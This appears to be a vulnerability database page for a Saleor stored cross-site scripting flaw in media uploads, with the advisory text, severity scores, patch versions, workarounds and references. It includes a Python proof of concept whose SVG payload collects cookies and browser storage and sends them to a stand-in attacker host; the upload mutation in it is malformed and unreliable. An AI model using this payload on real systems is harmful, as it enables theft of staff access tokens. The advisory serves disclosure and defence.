CVE-2026-23499

Description

Saleor is an e-commerce platform. Starting in version 3.0.0 and prior to versions 3.20.108, 3.21.43, and 3.22.27, Saleor allowed authenticated staff users or Apps to upload arbitrary files, including malicious HTML and SVG files containing Javascript. Depending on the deployment strategy, these files may be served from the same domain as the dashboard without any restrictions leading to the execution of malicious scripts in the context of the user's browser. Malicious staff members could craft script injections to target other staff members, possibly stealing their access and/or refresh tokens. Users are vulnerable if they host the media files inside the same domain as the dashboard, e.g., dashboard is at `example.com/dashboard/` and media are under `example.com/media/`. They are not impact if media files are hosted in a different domain, e.g., `media.example.com`. Users are impacted if they do not return a `Content-Disposition: attachment` header for the media files. Saleor Cloud users are not impacted. This issue has been patched in versions: 3.22.27, 3.21.43, and 3.20.108. Some workarounds are available for those unable to upgrade. Configure the servers hosting the media files (e.g., CDN or reverse proxy) to return the Content-Disposition: attachment header. This instructs browsers to download the file instead of rendering them in the browser. Prevent the servers from returning HTML and SVG files. Set-up a `Content-Security-Policy` for media files, such as `Content-Security-Policy: default-src 'none'; base-uri 'none'; frame-ancestors 'none'; form-action 'none';`.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:saleor:saleor:*:*:*:*:*:*:*:* - VULNERABLE

Saleor 3.0.0 - 3.20.107

Saleor 3.0.0 - 3.21.42

Saleor 3.0.0 - 3.22.26

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-23499 PoC - Malicious SVG File Upload
# This PoC demonstrates how an authenticated attacker can upload a malicious SVG file
# containing JavaScript code that will be executed in victims' browsers.

import requests
import json

TARGET_URL = "https://vulnerable-saleor-instance.com"
API_ENDPOINT = f"{TARGET_URL}/graphql/"

# Authentication token (Staff user or App token)
AUTH_TOKEN = "your_auth_token_here"

# Malicious SVG payload that steals cookies/tokens
MALICIOUS_SVG = '''<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">
    // Steal authentication tokens and send to attacker server
    var tokens = {
      cookies: document.cookie,
      localStorage: JSON.stringify(localStorage),
      sessionStorage: JSON.stringify(sessionStorage),
      referrer: document.referrer,
      url: window.location.href
    };
    
    // Send stolen data to attacker's endpoint
    fetch('https://attacker.com/collect?data=' + btoa(JSON.stringify(tokens)));
  </script>
</svg>'''

def upload_malicious_file():
    """Upload malicious SVG file via GraphQL mutation"""
    
    headers = {
        "Authorization": f"Bearer {AUTH_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # GraphQL mutation for file upload (simplified)
    mutation = """
    mutation {
        fileUpload(input: {
            url: "data:image/svg+xml;base64," + base64_encode(MALICIOUS_SVG)
        }) {
            uploadedFile {
                url
            }
        }
    }
    """
    
    response = requests.post(API_ENDPOINT, headers=headers, json={"query": mutation})
    
    if response.status_code == 200:
        result = response.json()
        malicious_url = result.get("data", {}).get("fileUpload", {}).get("uploadedFile", {}).get("url")
        print(f"[+] Malicious file uploaded successfully!")
        print(f"[+] Malicious URL: {malicious_url}")
        print(f"[+] When victims visit this URL, the JavaScript will execute in their browser context")
        return malicious_url
    else:
        print(f"[-] Upload failed: {response.text}")
        return None

if __name__ == "__main__":
    print("CVE-2026-23499 - Saleor Arbitrary File Upload leading to Stored XSS")
    print("=" * 70)
    upload_malicious_file()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23499
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23499
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23499/
[4] VulDB https://vuldb.com/cve/CVE-2026-23499
[5] https://docs.saleor.io/security/#restricted-file-uploads
[6] https://github.com/saleor/saleor/commit/77f7927a0db9a216440df92c51012136f13e1d99
[7] https://github.com/saleor/saleor/commit/7d33efc7a06252320cd51cbb20c2e308aed2fd10
[8] https://github.com/saleor/saleor/commit/9110eba68c3f73afa1f72b45bd9b1394c752d335
[9] https://github.com/saleor/saleor/commit/ac6936a336289c77398ef600cad3498ad4ba261c
[10] https://github.com/saleor/saleor/commit/b3cb27b3fe96dae3c879063e56d32a9398eabd24
[11] https://github.com/saleor/saleor/security/advisories/GHSA-666h-2p49-pg95

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23499", "sourceIdentifier": "[email protected]", "published": "2026-01-21T22:15:49.703", "lastModified": "2026-01-29T18:19:14.347", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Saleor is an e-commerce platform. Starting in version 3.0.0 and prior to versions 3.20.108, 3.21.43, and 3.22.27, Saleor allowed authenticated staff users or Apps to upload arbitrary files, including malicious HTML and SVG files containing Javascript. Depending on the deployment strategy, these files may be served from the same domain as the dashboard without any restrictions leading to the execution of malicious scripts in the context of the user's browser. Malicious staff members could craft script injections to target other staff members, possibly stealing their access and/or refresh tokens. Users are vulnerable if they host the media files inside the same domain as the dashboard, e.g., dashboard is at `example.com/dashboard/` and media are under `example.com/media/`. They are not impact if media files are hosted in a different domain, e.g., `media.example.com`. Users are impacted if they do not return a `Content-Disposition: attachment` header for the media files. Saleor Cloud users are not impacted. This issue has been patched in versions: 3.22.27, 3.21.43, and 3.20.108. Some workarounds are available for those unable to upgrade. Configure the servers hosting the media files (e.g., CDN or reverse proxy) to return the Content-Disposition: attachment header. This instructs browsers to download the file instead of rendering them in the browser. Prevent the servers from returning HTML and SVG files. Set-up a `Content-Security-Policy` for media files, such as `Content-Security-Policy: default-src 'none'; base-uri 'none'; frame-ancestors 'none'; form-action 'none';`."}, {"lang": "es", "value": "Saleor es una plataforma de comercio electrónico. A partir de la versión 3.0.0 y antes de las versiones 3.20.108, 3.21.43 y 3.22.27, Saleor permitía a los usuarios de personal autenticados o a las aplicaciones (Apps) subir archivos arbitrarios, incluyendo archivos HTML y SVG maliciosos que contenían Javascript. Dependiendo de la estrategia de despliegue, estos archivos pueden ser servidos desde el mismo dominio que el panel de control sin restricciones, lo que lleva a la ejecución de scripts maliciosos en el contexto del navegador del usuario. Miembros del personal maliciosos podrían crear inyecciones de scripts para atacar a otros miembros del personal, posiblemente robando sus tokens de acceso y/o de actualización. Los usuarios son vulnerables si alojan los archivos multimedia dentro del mismo dominio que el panel de control, p. ej., el panel de control está en 'example.com/dashboard/' y los medios están bajo 'example.com/media/'. No tienen impacto si los archivos multimedia están alojados en un dominio diferente, p. ej., 'media.example.com'. Los usuarios tienen impacto si no devuelven una cabecera 'Content-Disposition: attachment' para los archivos multimedia. Los usuarios de Saleor Cloud no tienen impacto. Este problema ha sido parcheado en las versiones: 3.22.27, 3.21.43 y 3.20.108. Algunas soluciones provisionales están disponibles para aquellos que no pueden actualizar. Configure los servidores que alojan los archivos multimedia (p. ej., CDN o proxy inverso) para que devuelvan la cabecera Content-Disposition: attachment. Esto indica a los navegadores que descarguen el archivo en lugar de renderizarlo en el navegador. Evite que los servidores devuelvan archivos HTML y SVG. Configure una 'Content-Security-Policy' para los archivos multimedia, como 'Content-Security-Policy: default-src 'none'; base-uri 'none'; frame-ancestors 'none'; form-action 'none';'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "m ... (truncated)